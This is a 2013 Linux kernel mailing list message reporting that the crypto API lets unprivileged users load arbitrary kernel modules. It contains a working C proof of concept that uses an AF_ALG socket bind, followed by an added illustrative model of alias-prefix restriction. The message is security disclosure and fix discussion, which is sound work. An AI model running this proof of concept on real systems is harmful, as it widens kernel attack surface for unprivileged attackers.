From: Mathias Krause <minipli@googlemail.com>
To: Kees Cook <keescook@google.com>
Cc: "Serge E. Hallyn" <serge@hallyn.com>,
"Eric W. Biederman" <ebiederm@xmission.com>,
LKML <linux-kernel@vger.kernel.org>,
Serge Hallyn <serge.hallyn@canonical.com>,
Brad Spengler <spender@grsecurity.net>,
Al Viro <viro@zeniv.linux.org.uk>, Eric Paris <eparis@redhat.com>,
Rusty Russell <rusty@rustcorp.com.au>,
PaX Team <pageexec@freemail.hu>,
Herbert Xu <herbert@gondor.hengli.com.au>,
"David S. Miller" <davem@davemloft.net>
Subject: Re: user ns: arbitrary module loading
Date: Mon, 4 Mar 2013 09:29:59 +0100
Message-ID: <20130304082959.GA22087@r00tworld.net>
In-Reply-To: <CAGXu5jKphNv9+wYE1GwfXKXDdzeWB_AtiqxT0e2PEzqCXNPkfQ@mail.gmail.com>
On Sun, Mar 03, 2013 at 09:48:50AM -0800, Kees Cook wrote:
> Several subsystems already have an implicit subsystem restriction
> because they load with aliases. (e.g. binfmt-XXXX, net-pf=NNN,
> snd-card-NNN, FOO-iosched, etc). This isn't the case for filesystems
> and a few others, unfortunately:
>
> $ git grep 'request_module("%.*s"' | grep -vi prefix
> crypto/api.c: request_module("%s", name);
>
> [...]
>
> Several of these come from hardcoded values, though (e.g. crypto, chipreg).
Well, crypto does not. Try the code snippet below on a system with
CONFIG_CRYPTO_USER_API=y. It'll abuse the above request_module() call
to load any module the user requests -- irregardless of being contained
in a user ns or not.
---8<---
/* Loading arbitrary modules using crypto api since v2.6.38
 *
 * - minipli
 */
#include <linux/if_alg.h>
#include <sys/socket.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

#ifndef AF_ALG
#define AF_ALG 38
#endif

int main(int argc, char **argv) {
	struct sockaddr_alg sa_alg = {
		.salg_family = AF_ALG,
		.salg_type = "hash",
	};
	int sock;

	if (argc != 2) {
		printf("usage: %s MODULE_NAME\n", argv[0]);
		exit(1);
	}

	sock = socket(AF_ALG, SOCK_SEQPACKET, 0);
	if (sock < 0) {
		perror("socket(AF_ALG)");
		exit(1);
	}

	strncpy((char *) sa_alg.salg_name, argv[1], sizeof(sa_alg.salg_name));
	bind(sock, (struct sockaddr *) &sa_alg, sizeof(sa_alg));
	close(sock);

	return 0;
}
--->8---
If people care about unprivileged users not being able to load arbitrary
modules, could someone please fix this in crypto API, then? Herbert?
Thanks,
Mathias
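
Added example (not part of the original message and not kernel code): a user-space C model of the alias restriction Kees describes in the quoted text, contrasting a bare "%s" module request with a subsystem-prefixed one. The module table, its aliases and the "crypto-" prefix are assumptions constructed for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for modprobe's view of installed modules: a module
 * resolves by its own name or by one of its declared aliases. */
struct module { const char *name; const char *alias[2]; };
static const struct module modules[] = {
    { "sha256_generic", { "sha256", "crypto-sha256" } }, /* assumed aliases */
    { "vfat",           { "fs-vfat", NULL } },           /* assumed alias */
    { "floppy",         { NULL, NULL } },
};

/* Returns the name of the module a request string would load, or NULL. */
static const char *resolve(const char *req)
{
    for (size_t i = 0; i < sizeof(modules) / sizeof(modules[0]); i++) {
        const struct module *m = &modules[i];
        if (strcmp(req, m->name) == 0)
            return m->name;
        for (int j = 0; j < 2 && m->alias[j]; j++)
            if (strcmp(req, m->alias[j]) == 0)
                return m->name;
    }
    return NULL;
}

/* Models request_module(prefix "%s", name) with a caller-supplied name.
 * An empty prefix is the unrestricted "%s" form quoted in the thread. */
static const char *request(const char *prefix, const char *name)
{
    char buf[64];
    int n = snprintf(buf, sizeof(buf), "%s%s", prefix, name);
    if (n < 0 || (size_t)n >= sizeof(buf))
        return NULL;    /* refuse names that would be truncated */
    return resolve(buf);
}

int main(void)
{
    const char *names[] = { "sha256", "vfat", "floppy" };
    for (size_t i = 0; i < sizeof(names) / sizeof(names[0]); i++) {
        const char *bare = request("", names[i]);
        const char *pref = request("crypto-", names[i]);
        printf("%-8s bare: %-16s prefixed: %s\n", names[i],
               bare ? bare : "(none)", pref ? pref : "(none)");
    }
    return 0;
}
```

With the bare form every name in the table resolves; with the prefix only the module that declares a matching alias does.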